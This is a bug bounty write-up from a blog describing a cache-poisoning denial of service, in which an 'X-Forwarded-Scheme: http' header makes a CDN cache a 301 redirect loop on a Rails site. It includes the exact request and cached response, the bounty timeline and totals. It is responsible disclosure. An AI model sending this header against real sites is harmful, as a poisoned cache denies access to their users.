Cache Poisoning DoS Via X-Forwarded-Scheme Header

Bounty: 3,000

I didn’t know this was a thing, until i saw @iustinBB ’s a blog about their research on Cache Poisoning Cache Poisoning at Scale

Sending the x-forwarded-scheme: http header would result  into a 301 redirect to the same location. If the response was cached by a CDN, it would cause a redirect loop, inherently denying access to the  file.

I quickly remembered a Private Program’s asset that was using caching servers and using Ruby on Rails

Request:

GET /?xxx HTTP/2 
Host: Redacted
X-Forwarded-Scheme: http 
...

If you will test this, you should always use “cache busters” (?anything=x) in this case, i used (?xxx) so i don’t mistakenly poisoned other users.

Response:

HTTP/2 301 Moved Permanently 
Date: Wed, 19 Jan 2022 17:16:13 GMT 
Content-Type: text/html 
Location: Redacted
Via: 1.1 vegur 
Cf-Cache-Status: HIT 
Age: 3

If an attacker timed the cache server and poison https://redacted/

The user’s response when requesting https://redacted/ will be

HTTP/2 301 Moved Permanently
Cf-Cache-Status: HIT 

They won’t be able to access https://redacted/ as the attacker saved the 301 redirect and would not load, until the cache refreshes.

Timeline:

Reported → January 19, 2022

Pending Program Review → January 25, 2022

Triaged → January 25, 2022

Bounty Awarded → January 26, 2022

The total $ for these 3 Reports was $11,300

I chose only these 3 reports because they were the most awarded ones.

I applied the same methodology on other programs, this includes Cache Deception issues like #1343086

Making a total of $15,400 on HackerOne and $1,100 on BugCrowd

Thanks for Reading!

Make sure to follow me on Twitter ;)

@bxmbn

🔈 🔈 Infosec Writeups is organizing its first-ever virtual conference and networking event. If you’re into Infosec, this is the coolest place to be, with 16 incredible speakers and 10+ hours of power-packed discussion sessions. Check more details and register here.